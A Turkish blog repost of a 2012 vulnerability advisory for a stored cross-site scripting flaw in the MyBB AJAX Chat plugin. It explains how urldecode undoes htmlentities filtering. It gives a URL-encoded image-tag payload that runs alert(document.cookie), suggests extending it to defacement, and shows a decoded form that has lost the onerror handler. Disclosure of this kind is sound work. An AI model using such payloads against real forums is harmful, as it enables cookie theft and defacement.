MyBB AJAX Chat Persistent XSS Vulnerability

servercheckxss

MyBB AJAX Chat Persistent XSS açığı bulunmuş olup, açığın oluşumu ve kullanıyla ilgili açık bulucunun açıklamaları şu şekilde.


# Title: MyBB AJAX Chat Persistent XSS Vulnerability

# Date: 12/12/2012

# Exploit Author: Mr. P-teo

# Vendor Homepage: http://www.mybb.com/

# Software Link: http://mods.mybb.com/view/ajax-chat

# Version: 1

# Tested on: Windows

The Persistent XSS vulnerability lies within the chat_frame.php page.

*************************************** Persistent / Stored XSS **************************************

Although the message is filter with the htmlentities function below.

<?php       $db->insert_query($tbl, array('uid' => $mybb->user['uid'], 'message' => $db->escape_string(htmlentities($message)), 'date' => time()));<br ?="">
?>

The vulnerability occurs with the use of the urldecode function, allowing us to bypass the htmlentities with url encoding.

<?php       $msg = urldecode($row["message"]);   ?>

The vulnerability can be exploited via the following line, decoded as - "><img alt="" src="XSS" />

%22%3E%3Cimg%20src%3D%22XSS%22%20onerror%3D%22alert(document.cookie)%22%20%2F%3E%0A

This can be expanded on with defaces etc, alert is just a basic example.

Brought to you be Mr. P-teo.

Twitter: http://twitter.com/MrPteo

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir